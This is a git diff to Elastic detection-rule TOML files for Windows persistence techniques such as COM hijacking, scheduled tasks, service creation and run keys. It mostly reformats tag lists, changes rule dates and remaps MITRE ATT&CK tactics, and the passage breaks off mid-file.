a/rules/windows/persistence_suspicious_com_hijack_registry.toml b/rules/windows/persistence_suspicious_com_hijack_registry.toml index 361b9902937..7fa5626eea9 100644 --- a/rules/windows/persistence_suspicious_com_hijack_registry.toml +++ b/rules/windows/persistence_suspicious_com_hijack_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] @@ -62,7 +62,16 @@ references = [ risk_score = 21 rule_id = "16a52c14-7883-47af-8745-9357803f0d4c" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", +] timestamp_override = "event.ingested" type = "eql" @@ -145,36 +154,48 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.015" name = "Component Object Model Hijacking" reference = "https://attack.mitre.org/techniques/T1546/015/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.015" name = "Component Object Model Hijacking" reference = "https://attack.mitre.org/techniques/T1546/015/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml b/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml index e09bae6d5d5..fcea266ea46 100644 --- a/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml +++ b/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -123,7 +123,17 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -137,18 +147,36 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml index fbf4a9d2f66..ed301eb30bb 100644 --- a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml +++ b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/11" [rule] author = ["Elastic"] @@ -122,36 +122,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_suspicious_service_created_registry.toml b/rules/windows/persistence_suspicious_service_created_registry.toml index 74baf725777..ec8cdfbd5d8 100644 --- a/rules/windows/persistence_suspicious_service_created_registry.toml +++ b/rules/windows/persistence_suspicious_service_created_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/23" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -61,7 +61,20 @@ Windows services are crucial for running background processes. Adversaries explo risk_score = 73 rule_id = "36a8e048-d888-4f61-a8b9-0f9e2e40f317" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -76,36 +89,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml b/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml index f5149a2636f..e3c5bf98f82 100644 --- a/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml +++ b/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/07" [rule] author = ["Elastic"] @@ -86,13 +86,27 @@ file where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] + +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_sysmon_wmi_event_subscription.toml b/rules/windows/persistence_sysmon_wmi_event_subscription.toml index ce0534283f4..53d948bc8c5 100644 --- a/rules/windows/persistence_sysmon_wmi_event_subscription.toml +++ b/rules/windows/persistence_sysmon_wmi_event_subscription.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/02" integration = ["windows", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -56,7 +56,15 @@ references = [ risk_score = 47 rule_id = "e72f87d0-a70e-4f8d-8443-a6407bc34643" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Sysmon", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Sysmon", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -74,36 +82,19 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.003" name = "Windows Management Instrumentation Event Subscription" reference = "https://attack.mitre.org/techniques/T1546/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.003" -name = "Windows Management Instrumentation Event Subscription" -reference = "https://attack.mitre.org/techniques/T1546/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_system_shells_via_services.toml b/rules/windows/persistence_system_shells_via_services.toml index 22823784c3b..2a0d907bce6 100644 --- a/rules/windows/persistence_system_shells_via_services.toml +++ b/rules/windows/persistence_system_shells_via_services.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -90,7 +90,21 @@ This rule looks for system shells being spawned by `services.exe`, which is comp risk_score = 47 rule_id = "0022d47d-39c7-4f69-a232-4fe9dc7a3acd" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Windows Security Event Logs", + "Data Source: Crowdstrike", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" @@ -106,12 +120,27 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -122,35 +151,10 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" -[[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_temp_scheduled_task.toml b/rules/windows/persistence_temp_scheduled_task.toml index 696d3b70b43..fbc8a28fda9 100644 --- a/rules/windows/persistence_temp_scheduled_task.toml +++ b/rules/windows/persistence_temp_scheduled_task.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -54,7 +54,15 @@ references = ["https://docs.microsoft.com/en-us/windows/security/threat-protecti risk_score = 47 rule_id = "81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -66,18 +74,36 @@ sequence by winlog.computer_name, winlog.event_data.TaskName with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_time_provider_mod.toml b/rules/windows/persistence_time_provider_mod.toml index 192d83104bd..7b99257a7d9 100644 --- a/rules/windows/persistence_time_provider_mod.toml +++ b/rules/windows/persistence_time_provider_mod.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [transform] [[transform.osquery]] @@ -105,7 +105,20 @@ references = ["https://pentestlab.blog/2019/10/22/persistence-time-providers/"] risk_score = 47 rule_id = "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -124,18 +137,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.003" name = "Time Providers" reference = "https://attack.mitre.org/techniques/T1547/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.003" +name = "Time Providers" +reference = "https://attack.mitre.org/techniques/T1547/003/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml b/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml index f37d13c84d1..708d2187cb4 100644 --- a/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml +++ b/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/04/24" [rule] author = ["Elastic", "Skoetting"] @@ -51,7 +51,16 @@ references = [ risk_score = 47 rule_id = "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Active Directory", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" @@ -93,36 +102,14 @@ iam where host.os.type == "windows" and event.action == "added-member-to-group" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_user_account_creation.toml b/rules/windows/persistence_user_account_creation.toml index 2b400ddc389..2bab46a9d12 100644 --- a/rules/windows/persistence_user_account_creation.toml +++ b/rules/windows/persistence_user_account_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -87,18 +87,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" - [[rule.threat.technique.subtechnique]] -id = "T1136.002" -name = "Domain Account" -reference = "https://attack.mitre.org/techniques/T1136/002/" +id = "T1136.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1136/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/persistence_via_application_shimming.toml b/rules/windows/persistence_via_application_shimming.toml index 68f099a5741..1fb717e1aa7 100644 --- a/rules/windows/persistence_via_application_shimming.toml +++ b/rules/windows/persistence_via_application_shimming.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/01" [rule] author = ["Elastic"] @@ -64,7 +64,20 @@ Application shimming is a Windows feature designed to ensure software compatibil risk_score = 21 rule_id = "fd4a992d-6130-4802-9ff8-829b89ae801f" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -88,36 +101,36 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.011" name = "Application Shimming" reference = "https://attack.mitre.org/techniques/T1546/011/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.011" name = "Application Shimming" reference = "https://attack.mitre.org/techniques/T1546/011/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_via_bits_job_notify_command.toml b/rules/windows/persistence_via_bits_job_notify_command.toml index d2a901ab4b0..d5ed04b003e 100644 --- a/rules/windows/persistence_via_bits_job_notify_command.toml +++ b/rules/windows/persistence_via_bits_job_notify_command.toml @@ -2,7 +2,7 @@ creation_date = "2021/12/04" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -68,7 +68,18 @@ references = [ risk_score = 47 rule_id = "c3b915e0-22f3-4bf7-991d-b643513c722f" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -85,26 +96,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1197" -name = "BITS Jobs" -reference = "https://attack.mitre.org/techniques/T1197/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/persistence_via_hidden_run_key_valuename.toml b/rules/windows/persistence_via_hidden_run_key_valuename.toml index 7a10e60c00b..1d217e04fb3 100644 --- a/rules/windows/persistence_via_hidden_run_key_valuename.toml +++ b/rules/windows/persistence_via_hidden_run_key_valuename.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/15" integration = ["endpoint", "windows", "crowdstrike", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -65,7 +65,21 @@ references = [ risk_score = 73 rule_id = "a9b05c3b-b304-4bf9-970d-acdfaef2944c" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", +] timestamp_override = "event.ingested" type = "eql" @@ -83,31 +97,43 @@ registry where host.os.type == "windows" and event.type == "change" and length(r [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_via_lsa_security_support_provider_registry.toml b/rules/windows/persistence_via_lsa_security_support_provider_registry.toml index 6abda8ce324..909fe26fa75 100644 --- a/rules/windows/persistence_via_lsa_security_support_provider_registry.toml +++ b/rules/windows/persistence_via_lsa_security_support_provider_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -61,7 +61,20 @@ Security Support Providers (SSPs) in Windows environments facilitate authenticat risk_score = 47 rule_id = "e86da94d-e54b-4fb5-b96c-cecff87e8787" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", 